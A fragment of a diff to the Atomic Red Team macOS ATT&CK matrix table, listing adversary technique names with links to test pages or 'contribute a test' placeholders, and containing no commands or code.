-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
